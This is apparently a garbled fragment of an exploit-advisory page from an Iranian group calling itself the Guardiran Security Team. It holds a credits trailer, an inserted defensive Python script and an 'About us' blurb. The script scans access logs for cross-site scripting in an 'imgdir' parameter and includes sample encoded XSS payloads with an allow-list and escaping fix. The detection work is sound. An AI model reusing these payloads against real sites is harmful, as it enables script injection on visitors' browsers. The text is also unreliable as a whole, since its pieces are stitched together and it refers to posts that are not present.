      # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T
      # We Are Guardiran Security Team
      # Discovered By:DeMoN
      ########################################################
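
A defender-side check for the `index.php?imgdir=` issue described in posts 24 and 25, added here as an example and not part of the original posts or of either vendor's code: it scans access-log lines for `imgdir` values that are not plain directory names, and shows the output encoding that keeps such a value from being parsed as markup. The log lines, the function names and the directory-name allow-list are assumptions constructed for illustration.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (documentation IP ranges, made-up requests).
SAMPLE_LOG = [
    '198.51.100.7 - - [15/Nov/2015:10:01:02 +0000] "GET /poto/index.php?imgdir=holiday2015 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [15/Nov/2015:10:03:44 +0000] "GET /poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3Etest%3C/h1%3E%3C/marquee%3E HTTP/1.1" 200 5342',
    '198.51.100.9 - - [15/Nov/2015:10:04:10 +0000] "GET /poto/index.php?imgdir=%2522%253Cscript%253E HTTP/1.1" 200 5342',
    '203.0.113.5 - - [15/Nov/2015:10:05:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate gallery directory is a short name of letters, digits, "_" or "-".
SAFE_DIR_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def imgdir_values(log_line):
    """Return the URL-decoded imgdir values found in one access-log line."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    query = urlsplit(match.group(1)).query
    return parse_qs(query, keep_blank_values=True).get("imgdir", [])


def find_injection_attempts(log_lines):
    """Return (client_ip, decoded_value) for every imgdir outside the allow-list."""
    hits = []
    for line in log_lines:
        for value in imgdir_values(line):
            # Markup, quotes and leftover "%" from double encoding all fail here.
            if not SAFE_DIR_RE.fullmatch(value):
                hits.append((line.split(" ", 1)[0], value))
    return hits


def render_imgdir(value):
    """Encode the value before writing it into HTML, so markup stays text."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for ip, value in find_injection_attempts(SAMPLE_LOG):
        print(ip, repr(value), "->", render_imgdir(value))
```

The same allow-list belongs in the application itself: rejecting any `imgdir` that is not a plain directory name, and encoding it on output, closes the reflection regardless of payload.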

About us

The Guardiran Security Team is an independent group whose rules do not conflict with the policies of the Islamic Republic of Iran. The Guardiran Security Team began its activity in 1393, and the team's goal is to secure Iranian websites and servers. Our team is always ready to defend the cyber borders of our beloved homeland, Iran.